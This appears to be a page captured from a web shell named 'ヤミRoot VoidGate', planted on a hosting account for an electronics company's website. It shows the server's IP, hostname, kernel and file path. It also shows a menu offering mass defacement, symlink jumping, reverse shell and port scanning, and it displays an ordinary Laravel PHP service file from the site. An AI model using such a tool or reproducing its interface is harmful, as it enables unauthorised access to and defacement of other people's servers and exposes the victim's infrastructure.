ヤミRoot VoidGate
User / IP
:
216.73.216.134
Host / Server
:
147.79.79.132 / www.jigishaelectronics.com
System
:
Linux us-bos-web1572.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u852776893
/
domains
/
jigishaelectronics.com
/
public_html
/
app
/
Services
/
Viewing: SocialRevoke.php
<?php namespace App\Services; use Illuminate\Http\Request; class SocialRevoke { public function apply($provider) { $provider_class = __NAMESPACE__ . '\\Revoke\\' . str_replace(' ', '', ucwords(str_replace('_', ' ', $provider.'Revoke'))); if (class_exists($provider_class)) { return (new $provider_class)->apply(); } $revoke = new $provider_class(); return $revoke->apply(); } }
Coded With 💗 by
0x6ick